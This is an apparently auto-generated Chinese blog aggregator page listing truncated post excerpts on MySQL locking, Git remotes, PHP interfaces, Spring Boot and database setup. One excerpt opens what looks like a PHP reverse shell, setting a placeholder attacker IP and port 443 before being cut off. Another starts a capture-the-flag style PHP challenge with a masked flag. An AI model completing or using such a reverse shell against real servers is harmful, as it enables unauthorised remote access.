HeidiSQL https://github.com/HeidiSQL/HeidiSQL HeidiSQL is a graphical interface for managing MariaDB or MySQL servers, Microsoft SQL databases, Postgr ...
                            
                            
                                分类:
数据库   时间:
2021-07-05 19:08:22   
                                阅读次数:
0
                             
                    
                        
                            
                            
                                
                    表锁是MySQL最基本的锁策略,并且是开销最小的策略。表锁会锁定整张表,一个用户在对表进行写操作前需要先获得写锁,这会阻塞其他用户对该表的所有读写操作。只有没有写锁时,其他读取的用户才能获取读锁,读锁之间不相互阻塞。 行锁可以最大程度的支持并发,同时也带来了最大开销。innoDB和XtraDB以及一 ...
                            
                            
                                分类:
数据库   时间:
2021-07-05 19:06:17   
                                阅读次数:
0
                             
                    
                        
                            
                            
                                
                    <?php $info = ""; $req = []; $flag="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; ini_set("display_error", false); //为一个配置选项设置值 error_reporting(0); //关闭所有PHP错 ...
                            
                            
                                分类:
Web程序   时间:
2021-07-05 19:06:03   
                                阅读次数:
0
                             
                    
                        
                            
                            
                                
                    6. Git管理远程仓库 使用远程仓库的目的 作用:备份,实现代码共享集中化管理 Git克隆操作 目的 将远程仓库(github对应的项目)复制到本地 代码 git clone 仓库地址 多学一招:仓库地址由来 将本地仓库同步到git远程仓库中 git push ︴思考:为什么无法同步 或没有权限  ...
                            
                            
                                分类:
其他好文   时间:
2021-07-05 19:00:54   
                                阅读次数:
0
                             
                    
                        
                            
                            
                                
                    <?php error_reporting (E_ERROR); ignore_user_abort(true); ini_set('max_execution_time',0); $ipaddr = 'xxx.xxx.xxx.xxx'; $port = '443'; $msg = php_unam ...
                            
                            
                         
                    
                        
                            
                            
                                
                    接口定义 interface 关键字定义的类就叫接口 接口实例 <?php //接口定义 interface Human{ //跑步 public function run(); //跳远 public function jump(); } //接口实现 class Person implement ...
                            
                            
                                分类:
Web程序   时间:
2021-07-05 18:53:37   
                                阅读次数:
0
                             
                    
                        
                            
                            
                                
                    本博客记录了IDEA中使用Springboot框架搭建一个web+mysql项目的详细过程,适合springboot初学者学习。 ...
                            
                            
                                分类:
数据库   时间:
2021-07-05 18:53:16   
                                阅读次数:
0
                             
                    
                        
                            
                            
                                
                    在购买服务器且安装了Mysql之后,并且安全组和防火墙都开放了端口,但是还是无法连接 原因就是mysql设置的就是只有本机可以连接 解决办法 # 1. 登录服务器,在服务器上登录mysql # 2. 使用user这个库 use user; # 3. 查看root账户 select host,user ...
                            
                            
                                分类:
数据库   时间:
2021-07-05 18:40:36   
                                阅读次数:
0
                             
                    
                        
                            
                            
                                
                    1、官网下载UnixODBC:unixODBC 2.3.2 麒麟官网:http://download.cs2c.com.cn/neokylin/desktop/development/5.4/ls_64/os/Packages/ 龙芯官网http://ftp.loongnix.org/os/loon ...
                            
                            
                                分类:
数据库   时间:
2021-07-05 18:16:03   
                                阅读次数:
0
                             
                    
                        
                            
                            
                                1 进入PHP官网 https://www.php.net/ 2 点击download,选择相应的版本,点击windows下载链接 这里我需要下载5.5版本的,而7以前的版本在这个页面上是没有显示的,所以得去别的地方下载,下面的地址都有: https://windows.php.net/downlo ...